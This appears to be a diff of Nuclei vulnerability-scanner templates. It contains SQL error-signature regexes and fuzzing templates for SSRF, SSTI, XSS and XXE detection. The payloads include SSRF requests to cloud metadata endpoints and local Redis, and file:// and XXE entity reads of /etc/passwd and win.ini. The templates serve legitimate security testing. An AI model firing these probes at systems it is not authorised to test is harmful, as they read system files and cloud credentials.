- "Ingres SQLSTATE"
|
||||
- "Ingres\\W.*?Driver"
|
||||
- "com\\.ingres\\.gcf\\.jdbc"
|
||||
|
||||
- type: regex
|
||||
name: frontbase
|
||||
regex:
|
||||
- "Exception (condition )?\\d+\\. Transaction rollback"
|
||||
- "com\\.frontbase\\.jdbc"
|
||||
- "Syntax error 1. Missing"
|
||||
- "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\."
|
||||
|
||||
- type: regex
|
||||
name: hsqldb
|
||||
regex:
|
||||
- "Unexpected end of command in statement \\["
|
||||
- "Unexpected token.*?in statement \\["
|
||||
- "org\\.hsqldb\\.jdbc"
|
||||
|
||||
- type: regex
|
||||
name: h2
|
||||
regex:
|
||||
- "org\\.h2\\.jdbc"
|
||||
- "\\[42000-192\\]"
|
||||
|
||||
- type: regex
|
||||
name: monetdb
|
||||
regex:
|
||||
- "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)"
|
||||
- "\\[MonetDB\\]\\[ODBC Driver"
|
||||
- "nl\\.cwi\\.monetdb\\.jdbc"
|
||||
|
||||
- type: regex
|
||||
name: apachederby
|
||||
regex:
|
||||
- "Syntax error: Encountered"
|
||||
- "org\\.apache\\.derby"
|
||||
- "ERROR 42X01"
|
||||
|
||||
- type: regex
|
||||
name: vertica
|
||||
regex:
|
||||
- ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"
|
||||
- "/vertica/Parser/scan"
|
||||
- "com\\.vertica\\.jdbc"
|
||||
- "org\\.jkiss\\.dbeaver\\.ext\\.vertica"
|
||||
- "com\\.vertica\\.dsi\\.dataengine"
|
||||
|
||||
- type: regex
|
||||
name: mckoi
|
||||
regex:
|
||||
- "com\\.mckoi\\.JDBCDriver"
|
||||
- "com\\.mckoi\\.database\\.jdbc"
|
||||
- "<REGEX_LITERAL>"
|
||||
|
||||
- type: regex
|
||||
name: presto
|
||||
regex:
|
||||
- "com\\.facebook\\.presto\\.jdbc"
|
||||
- "io\\.prestosql\\.jdbc"
|
||||
- "com\\.simba\\.presto\\.jdbc"
|
||||
- "UNION query has different number of fields: \\d+, \\d+"
|
||||
|
||||
- type: regex
|
||||
name: altibase
|
||||
regex:
|
||||
- "Altibase\\.jdbc\\.driver"
|
||||
|
||||
- type: regex
|
||||
name: mimersql
|
||||
regex:
|
||||
- "com\\.mimer\\.jdbc"
|
||||
- "Syntax error,[^\\n]+assumed to mean"
|
||||
|
||||
- type: regex
|
||||
name: cratedb
|
||||
regex:
|
||||
- "io\\.crate\\.client\\.jdbc"
|
||||
|
||||
- type: regex
|
||||
name: cache
|
||||
regex:
|
||||
- "encountered after end of query"
|
||||
- "A comparison operator is required here"
|
||||
|
||||
- type: regex
|
||||
name: raimadatabasemanager
|
||||
regex:
|
||||
- "-10048: Syntax error"
|
||||
- "rdmStmtPrepare\\(.+?\\) returned"
|
||||
|
||||
- type: regex
|
||||
name: virtuoso
|
||||
regex:
|
||||
- "SQ074: Line \\d+:"
|
||||
- "SR185: Undefined procedure"
|
||||
- "SQ200: No table "
|
||||
- "Virtuoso S0002 Error"
|
||||
- "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"
|
||||
# digest: 4a0a00473045022100991ee3aa73500a4773ffbc23f50ab000999d53da3f5ab8723a4abc146eba69ee02207ef58106e21c140b29dfabac8270bbe11bd86b7b14f51b785f437e20d1f124de:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,42 @@
|
|||
id: blind-ssrf
|
||||
|
||||
info:
|
||||
name: Blind SSRF OAST Detection
|
||||
author: pdteam
|
||||
severity: medium
|
||||
tags: ssrf,dast,oast
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
ssrf:
|
||||
- "{{interactsh-url}}"
|
||||
- "{{FQDN}}.{{interactsh-url}}"
|
||||
- "{{RDN}}.{{interactsh-url}}"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
mode: single
|
||||
values:
|
||||
- "https?://" # Replace HTTP URLs with alternatives
|
||||
fuzz:
|
||||
- "https://{{ssrf}}"
|
||||
|
||||
- part: query
|
||||
mode: single
|
||||
values:
|
||||
- "^[A-Za-z0-9-._]+:[0-9]+$" # Replace <host>:<port> with alternative
|
||||
fuzz:
|
||||
- "{{ssrf}}:80"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
# digest: 4a0a004730450221008e67c53d4368607db787a520c50ce1ae8c742483ea80c0e7d34ab8ef529d2c9902205c049079f166eae9a8e5c5c99b72a048bebaa05de3eb3828adb9d81fab3543aa:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,129 @@
|
|||
id: response-ssrf
|
||||
|
||||
info:
|
||||
name: Full Response SSRF Detection
|
||||
author: pdteam,pwnhxl,j4vaovo
|
||||
severity: high
|
||||
reference:
|
||||
- https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py
|
||||
tags: ssrf,dast
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
ssrf:
|
||||
- 'http://{{interactsh-url}}'
|
||||
- 'http://{{FQDN}}.{{interactsh-url}}'
|
||||
- 'http://{{RDN}}.{{interactsh-url}}'
|
||||
- 'file:////./etc/./passwd'
|
||||
- 'file:///c:/./windows/./win.ini'
|
||||
- 'http://metadata.tencentyun.com/latest/meta-data/'
|
||||
- 'http://100.100.100.200/latest/meta-data/'
|
||||
- 'http://169.254.169.254/latest/meta-data/'
|
||||
- 'http://169.254.169.254/metadata/v1'
|
||||
- 'http://127.0.0.1:22'
|
||||
- 'http://127.0.0.1:3306'
|
||||
- 'dict://127.0.0.1:6379/info'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
mode: single
|
||||
keys:
|
||||
- callback
|
||||
- continue
|
||||
- data
|
||||
- dest
|
||||
- dir
|
||||
- domain
|
||||
- feed
|
||||
- file
|
||||
- host
|
||||
- html
|
||||
- imgurl
|
||||
- navigation
|
||||
- next
|
||||
- open
|
||||
- out
|
||||
- page
|
||||
- path
|
||||
- port
|
||||
- redirect
|
||||
- reference
|
||||
- return
|
||||
- show
|
||||
- site
|
||||
- to
|
||||
- uri
|
||||
- url
|
||||
- val
|
||||
- validate
|
||||
- view
|
||||
- window
|
||||
fuzz:
|
||||
- "{{ssrf}}"
|
||||
|
||||
- part: query
|
||||
mode: single
|
||||
values:
|
||||
- "(https|http|file)(%3A%2F%2F|://)(.*?)"
|
||||
fuzz:
|
||||
- "{{ssrf}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Interactsh Server"
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- 'SSH-(\d.\d)-OpenSSH_(\d.\d)'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '(\d.\d.\d)(.*?)mysql_native_password'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- 'root:.*?:[0-9]*:[0-9]*:'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'for 16-bit app support'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- 'dns-conf\/[\s\S]+instance\/'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- 'app-id[\s\S]+placement\/'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- 'ami-id[\s\S]+placement\/'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- 'id[\s\S]+interfaces\/'
|
||||
# digest: 4a0a00473045022100f1036d0d83d2d319f244f143873a16f2ae222e1f0d7dfa3a12604bc50547945c022014f428e033f9ac02ba873325301b910fde7ae7fac3613ab0388ea5d9a14e5f56:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,53 @@
|
|||
id: reflection-ssti
|
||||
|
||||
info:
|
||||
name: Reflected SSTI Arithmetic Based
|
||||
author: pdteam
|
||||
severity: medium
|
||||
reference:
|
||||
- https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java
|
||||
- https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update
|
||||
tags: ssti,dast
|
||||
|
||||
variables:
|
||||
first: "{{rand_int(1000, 9999)}}"
|
||||
second: "{{rand_int(1000, 9999)}}"
|
||||
result: "{{to_number(first)*to_number(second)}}"
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
skip-variables-check: true
|
||||
payloads:
|
||||
ssti:
|
||||
- '{{concat("${", "{{first}}*{{second}}", "}")}}'
|
||||
- '{{concat("{{", "{{first}}*{{second}}", "}}")}}'
|
||||
- '{{concat("<%=", "{{first}}*{{second}}", "%>")}}'
|
||||
- '{{concat("{", "{{first}}*{{second}}", "}")}}'
|
||||
- '{{concat("{{{", "{{first}}*{{second}}", "}}}")}}'
|
||||
- '{{concat("${{", "{{first}}*{{second}}", "}}")}}'
|
||||
- '{{concat("#{", "{{first}}*{{second}}", "}")}}'
|
||||
- '{{concat("[[", "{{first}}*{{second}}", "]]")}}'
|
||||
- '{{concat("{{=", "{{first}}*{{second}}", "}}")}}'
|
||||
- '{{concat("[[${", "{{first}}*{{second}}", "}]]")}}'
|
||||
- '{{concat("${xyz|", "{{first}}*{{second}}", "}")}}'
|
||||
- '{{concat("#set($x=", "{{first}}*{{second}}", ")${x}")}}'
|
||||
- '{{concat("@(", "{{first}}*{{second}}", ")")}}'
|
||||
- '{{concat("{@", "{{first}}*{{second}}", "}")}}'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: postfix
|
||||
fuzz:
|
||||
- "{{ssti}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{{result}}"
|
||||
# digest: 4a0a00473045022060b24ab805932a9aae5635d76725d92d78d3366f76b103480386f7db2231b750022100cf4e3feff8153a59a9b668bbe6c989c4940074ec6857c5f4f4f920660719143d:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,46 @@
|
|||
id: dom-xss
|
||||
|
||||
info:
|
||||
name: DOM Cross Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Detects DOM-based Cross Site Scripting (XSS) vulnerabilities.
|
||||
impact: |
|
||||
Allows attackers to execute malicious scripts in the victim's browser.
|
||||
remediation: |
|
||||
Sanitize and validate user input to prevent script injection.
|
||||
tags: xss,dom,dast,headless
|
||||
variables:
|
||||
num: "{{rand_int(10000, 99999)}}"
|
||||
headless:
|
||||
- steps:
|
||||
- action: navigate
|
||||
args:
|
||||
url: "{{BaseURL}}"
|
||||
|
||||
- action: waitload
|
||||
payloads:
|
||||
reflection:
|
||||
- "'\"><h1>{{num}}</h1>"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: postfix
|
||||
mode: single
|
||||
fuzz:
|
||||
- "{{reflection}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<h1>{{num}}</h1>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
# digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,41 @@
|
|||
id: reflected-xss
|
||||
|
||||
info:
|
||||
name: Reflected Cross Site Scripting
|
||||
author: pdteam
|
||||
severity: medium
|
||||
tags: xss,rxss,dast
|
||||
|
||||
variables:
|
||||
first: "{{rand_int(10000, 99999)}}"
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
reflection:
|
||||
- "'\"><{{first}}"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: postfix
|
||||
mode: single
|
||||
fuzz:
|
||||
- "{{reflection}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{{reflection}}"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,52 @@
|
|||
id: generic-xxe
|
||||
|
||||
info:
|
||||
name: Generic XML external entity (XXE)
|
||||
author: pwnhxl
|
||||
severity: medium
|
||||
reference:
|
||||
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
|
||||
tags: dast,xxe
|
||||
|
||||
variables:
|
||||
rletter: "{{rand_base(6,'abc')}}"
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
xxe:
|
||||
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
|
||||
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
keys-regex:
|
||||
- "(.*?)xml(.*?)"
|
||||
fuzz:
|
||||
- "{{xxe}}"
|
||||
|
||||
- part: query
|
||||
values:
|
||||
- "(<!DOCTYPE|<?xml|%3C!DOCTYPE|%3C%3Fxml)(.*?)>"
|
||||
fuzz:
|
||||
- "{{xxe}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
name: linux
|
||||
part: body
|
||||
regex:
|
||||
- 'root:.*?:[0-9]*:[0-9]*:'
|
||||
|
||||
- type: word
|
||||
name: windows
|
||||
part: body
|
||||
words:
|
||||
- 'for 16-bit app support'
|
||||
# digest: 490a00463044022057ed734a899a6e84282567122e7cbd55d596db47869a9f1079fdda8222765cdd02206129d4a12c906388ae43c37e4048a1913371fc637748eaaefc1356dbae82d139:922c64590222798bb761d5b6d8e72950
|
|
@ -81,4 +81,4 @@ dns:
|
|||
name: "edge-cast"
|
||||
words:
|
||||
- "edgecastdns.net"
|
||||
# digest: 4a0a00473045022052cc795314a697081c68e82277bf2be22ff53410f9a9a69af759ecefcd5b235b022100f94a899ec64709bb1f7d4e648dc091ee40029b754e4cc451882f0ccb68ff4921:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502207543d23b674d6f6af33197f11d534a088adecaa546feb4f674e59c3e17435c14022100ac553ae6b8aa7adc877bf3324accc71ae8801972775c0ed2961e076777d0b66c:922c64590222798bb761d5b6d8e72950
|
|
@ -23,4 +23,4 @@ dns:
|
|||
- type: regex
|
||||
regex:
|
||||
- "v=spf1(.+)"
|
||||
# digest: 4b0a00483046022100ada13ee531e36c1b45b196bafc39386d03ee223d98f9d0c3d3bd6f0609c6101202210099f776bb4a582a65c321385adc3d8fa9ec6f3047e658c38c6da98c89dd82c7c9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100e0f6a26cc45857637d83de49ed369272f053c612baef9673f5193256fda98135022100ac6d435df18fdcfdbad52417c38d2dcbff9a58cd2217ba3a66a214fa400ec72b:922c64590222798bb761d5b6d8e72950
|
|
@ -218,4 +218,4 @@ dns:
|
|||
name: "whimsical"
|
||||
words:
|
||||
- "whimsical"
|
||||
# digest: 490a00463044022043132b95ad11ec72665418855d60e0d979abbe9957b18f9170981f4f4af22a72022054d2942e7554851cd1f043f99d5e119ff9e8943a635a891927b1897d270383b9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100b1a2ab86bb10ef6a55eaa2a6ec8a5adc22a05f003de6e5f6ef884921c4a66e12022054a8c73bec1723fa0637e65cf405f5a5091f6f257d743962dca0691ac639ce2a:922c64590222798bb761d5b6d8e72950
|
|
@ -1,4 +1,4 @@
|
|||
id: dom-xss
|
||||
id: dom-invader-xss
|
||||
|
||||
info:
|
||||
name: DOM Invader - Cross-Site Scripting
|
||||
|
@ -50,5 +50,4 @@ file:
|
|||
- 'location(\.href|\.hash|\.search|\.pathname)?'
|
||||
- 'window\.name'
|
||||
- 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)'
|
||||
|
||||
# digest: 4a0a004730450220156c7817e33c48d906821587c273a5b1ecd3ed8996c0616e7468f27a46d04aec022100893e4c2dce9b2668a6643dd2fbe05f4a536c3b2df1e7223d971503333da4fb7f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402207cb01583d1a2752ecf4e9fc678dfecec46dfa254251612555d2126e63fc7c7e002202b4d56e018e4837351900cabe41fbb26d0f23c13bfbf5387f8e2161fff66ba60:922c64590222798bb761d5b6d8e72950
|
|
@ -70,4 +70,4 @@ headless:
|
|||
words:
|
||||
- "swagger"
|
||||
case-insensitive: true
|
||||
# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a004830460221008c5bb8afdc142dbf782c9bb579a7ed08079c67387a1285aaa34a20bd5f67a8e9022100905594915fd641bd07174ef818dd215bc18bc32845731f1aeb85ca745c8612e2:922c64590222798bb761d5b6d8e72950
|
|
@ -43,4 +43,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502207a313d7af0bc61b06a7aad51917107f695550ad08a26e2a14f08c21800e83d750221009d18bf0ba9ffe17a4ed9d2dfcf6469d2a043290dc3176391f4382ac302fab0de:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100f18bd6804b42bce98cc02cea3261854e17f9d58bcb7034e2dc7289c456c57c0d022100d91840b613c0b2544a15e2ae802e176fea630dee4788fe64c5e40f9082bc1374:922c64590222798bb761d5b6d8e72950
|
|
@ -50,4 +50,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100f500597dac602cf617f29345b26e201c4d927ac567ff15851e270cca11ea1272022100890d6111631f224e22f99c1eb4ba645f25661a55ad8ca32ad947435cf6dfbc03:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502201530427f983f1ac47d92a3e00fb141fab33efd4f9ac109b29beca3488669ca5b022100e7ab1cc3fec5da235092a57848d0f83403d81bff12d5ed347ee7d6442b19444c:922c64590222798bb761d5b6d8e72950
|
|
@ -48,4 +48,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a0046304402202bfa4d60c826a7ee4d2a099739649fe1a6f400138d8e83e4df629f9f019ef50702202d86756c4a21bf6ff7b1eabb8737b621c568040838835ad7cfca57a8191ebd4b:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a004830460221009dd2f6f1f47f6884512787786f2340268b3b43d1f115d5b41a670c3f29f42c4d022100dd3b55ba93d169763824f63a0016a520e29f80044dd7087a2d1122f4b3617c19:922c64590222798bb761d5b6d8e72950
|
|
@ -39,4 +39,4 @@ http:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
|
||||
# digest: 4a0a0047304502200c6f6ff6cbea5187645a7c7ff440cb6a60b01ff1a1a763cb4e9ed83296f4471002210082d1866b9c2aac0e20a0b2d8e26652bb7a23a443673b24eaa51bc1b20660d380:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502200942a34b2650323617b6c0a05aed0e60c5452d3b77477cfa2760dd51678d7371022100cf0d486cba6f8042c311e7cc3134723dd8e8b86ff44b5cdb22e0adbfe3ba3776:922c64590222798bb761d5b6d8e72950
|
|
@ -43,4 +43,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100b8520088ed41f6e865f68d2bc3c88014cdf7b5941d4f2225b32b1c246baca10f022100c1c3a4dcf74387e8c384df5f5c1c65d4d46844c0531c5d7314adb1135fd17075:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100ce759080f0a66542cb9e9ef838c4eec1bfc1ff9f685db0a5e1b5288ec69daa6202210098c3b44c36f631ea8314785ec5f8b01f320897dbb8fbfe5549601f5dfa1cfaaf:922c64590222798bb761d5b6d8e72950
|
|
@ -44,4 +44,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502205a2887a4a011d195cc34cf71a7a0747f9c287c37e0290029074917bfc3bf91af0221009d4d6050db82f4d260d632a1aeba31fc2bc837980a1c88e9b4dd4d50635b8f4c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402200ed59822b672884f4e50ef40df983fb0862418cede91f6dc96f764425e4bf4e302205b376b90e98b64ced2421151d9636a14d0dd0830c2dee682c77cda12c602e7f1:922c64590222798bb761d5b6d8e72950
|
|
@ -53,4 +53,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022063c3ab85bdde986f6ecc6a7dc4c3b023729ed6261822f93adbb48cdbdc76805a022100b6565e184fe99d2814ca5f1e5250128bcb9a412480aeb5e1633dd41adaaf3dc9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100860fb5fb6459c546fd88f49a316826632cf5a5f32bc9e9a5ce27dce40d150997022100b0b9ecb0467a3de0631a06e2e867b73844a98e132eef931105650d75e196e26f:922c64590222798bb761d5b6d8e72950
|
|
@ -42,4 +42,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022056f02ed80d5fe3f78efcf57295b1bf88f9f3f30684ed4c1e3be256359987a08c022100ac892ca2c57594746d969a1e1a0e78b802404382d91a2c79e49aa7f4d4c1e6af:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402207688a03699896a3d8c9a6254539a13ace8813096112296d102ca74fc45a0f17b022036a518c6e517befe270990e5d1a9d992f8b19f1fa36086546a11b544ff84c692:922c64590222798bb761d5b6d8e72950
|
|
@ -51,4 +51,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a0048304602210089e9b9d8a81e305a5525c94b09cbea3efb2244f688cdcc286da2a8a1a45f0158022100e3715b3c6532153024ae9aa71e9f2409a886433642805d8930de99b6b2043170:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022037e628251b17abd8fa644b564dab5c21ed475158752e510f311df96b9d63497402201bb1673e45a11edc53bdf0a83147c1a87a74c36358ede8fe0f576850c4d4900b:922c64590222798bb761d5b6d8e72950
|
|
@ -47,4 +47,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100f122a2f81805e8560dced37623295f6598fda06b15a8484cdc86a9a40dc59fbd02205654c1bd9945d3ec7784092170b4c87bc47d00dbcb28549047e07ee3229f5b99:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502205ecbba6e0e199b46f608f16ac8f807072e05bbafa717633027622a0dda0496fe022100df4658dec4f7e3cb9a3a5a504830913ca49faea4c712f6285b50dbc2ea9d1df3:922c64590222798bb761d5b6d8e72950
|
|
@ -47,4 +47,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100baa8ee591c8440e6668b12c357528938dbbf22644498e33c452cc22f60aaccd70221008a9561bbba4b70a1ffd7025d54cd0280b0e3d8287aa26f643638916cf13ce84c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100e337afcba9ba8a3b54040f339305e5467dbb5fda18b50da4f493484a5c5182d2022100e24c3017a7abcd267ab66ab6e255d1ed5ea56d71492bcb6afd58d3a093e618c1:922c64590222798bb761d5b6d8e72950
|
|
@ -43,4 +43,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502200895a0e8d132e643a349210d71d819f5f95f0ec17602b8030ca950203d2338a1022100e8d25e5c0329c2801185ed829e44d1d0ca605178760cab92c5d3320477498671:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022063b96588b6252e04e12101a7ef9a2744b1ad191e0f2e42b4cea08a43b7e42f35022057a31c495c450ec89adc4ad386b5203ac3b15d93fe5224986eb90f9b47ca4967:922c64590222798bb761d5b6d8e72950
|
|
@ -40,4 +40,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502205adf857f585313b44dd30eaf302b3883aa4d97143d3d1242e1b4a24c4cdb7327022100f3eb1540d5bbfa850a3242ed41ca554a5f6e74aaa82d2babb518f57624e6ddd8:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220233b1d67c643f2b04cc98635c1308c7fc6957ca19112156b50312a3c02301dd7022062edfca4c36a26a476f2dcbf466e092d2e1d048bd645dff71dbb23bb91ff5af5:922c64590222798bb761d5b6d8e72950
|
|
@ -42,4 +42,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100ed026dab65baa9ef29ab1e768f776c1dbb4b9ff011c976794c88dc65a44c384c0220443199e8d31dec84aa20713c1a05e3ffb292a094b28f0bbfbc817ccdac642f0e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100c60015398304f9ce817dba9913fa3eea08043b9830cef5a4e1baeaadb99b5a0c022100d34a8d77d912dc1372e761e3ea0d4ccda3e9bcacddb4dd58752f9c53d81c8048:922c64590222798bb761d5b6d8e72950
|
|
@ -54,4 +54,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a0046304402200d4e972e654e7e0fdb1c9be76571b8e58770c362f8b2a8ba7d10022812dff36102204fa02d8b876b4f57d9285491f7f158412390db3b2daf5e37d14dab7c7221c3b6:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402200fe7f64211b0ac14e48925d06d09a65070632e86c47843b9217a84320880330d022078feaff899b6d7e68e8cc85f5dbbc923969ec1a18c3259c0bcea48559cd82b1a:922c64590222798bb761d5b6d8e72950
|
|
@ -45,4 +45,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a004630440220083acd925279fe6edeb75107c9d2d21ccc0096ade5f9d0cdf1d01104af8c383702200dfe5e75e8c824f35e55514fde2e40756143fa538ed039b28af501f560d40401:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022060c84de88a71ccf8b996bea22ac6b62a2e003d9b3b8689c2d617d3e2f1ad99bc02202c59470b8795792f83ecbf5e7c7b37395db50a218f420b0fa76f2accc49d815f:922c64590222798bb761d5b6d8e72950
|
|
@ -38,4 +38,4 @@ http:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||
# digest: 4a0a0047304502202273c4a5ca4379f451fcceb66f3f59ccdd0fba2b3efe6ddc759f20702b101b1a022100ae14fa5d00c247d628930d378967273ea99394b3e2fa6034c97d1dd3ce00fba8:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ffdf11249d57dd33b3a45982e01655bacfcd643a4c57e97aa5f891243557c3b202205fd36fccfd2f9c9afdec7d8b8b4463ac9a1d07a52b558de7a68f374cbc5bc3ce:922c64590222798bb761d5b6d8e72950
|
|
@ -39,4 +39,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
# digest: 4a0a00473045022008fe957e293c8ade7c0de8fa4fe27072e0e2eb0b62667c49e63adb4d607b37fd02210081746edf1edce4b1d9862186eaf406060447a5274c63c24410f3300e3e71377a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100b390e617f8d9be114aea50840c529aab08fac1822e4dece7746cb7733a409631022100b30c36b38ea49931b16615862de2267a59370daf662b7e77c88b25add453fb8e:922c64590222798bb761d5b6d8e72950
|
|
@ -43,4 +43,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
